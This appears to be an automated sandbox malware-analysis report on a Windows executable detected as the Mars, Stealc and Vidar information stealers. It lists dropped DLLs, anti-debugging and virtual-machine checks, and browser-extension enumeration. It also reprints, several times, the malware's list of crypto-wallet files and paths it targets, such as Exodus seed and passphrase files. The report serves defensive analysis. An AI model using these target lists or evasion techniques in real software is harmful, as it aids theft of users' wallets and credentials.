                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004176C5 push ecx; ret 0_2_004176D8
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFCB536 push ecx; ret 0_2_6CFCB549
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00416240

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking locale)
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-74900
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI coverage: 4.8 %
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040D1C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004015C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00411650
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040B610
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040DB60
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040D540
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00412570
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004121F0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00411B80
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00401120 GetSystemInfo,ExitProcess,0_2_00401120
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI call chain: ExitProcess graph end nodegraph_0-74885
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI call chain: ExitProcess graph end nodegraph_0-74888
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI call chain: ExitProcess graph end nodegraph_0-75933
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI call chain: ExitProcess graph end nodegraph_0-74938
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI call chain: ExitProcess graph end nodegraph_0-74906
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI call chain: ExitProcess graph end nodegraph_0-74899
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeAPI call chain: ExitProcess graph end nodegraph_0-74914
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417B4E
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00416240
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h]0_2_00415DC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404C70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00419DC7 SetUnhandledExceptionFilter,0_2_00419DC7
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417B4E
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004173DD
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFCB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CFCB66C
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFCB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CFCB1F7
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D17AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D17AC62

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00415D00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFCB341 cpuid 0_2_6CFCB341
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00414570
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,0_2_00414450
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004143C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_004144B0

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Mars stealer
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Yara detected Stealc
                  Source: Yara matchFile source: 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 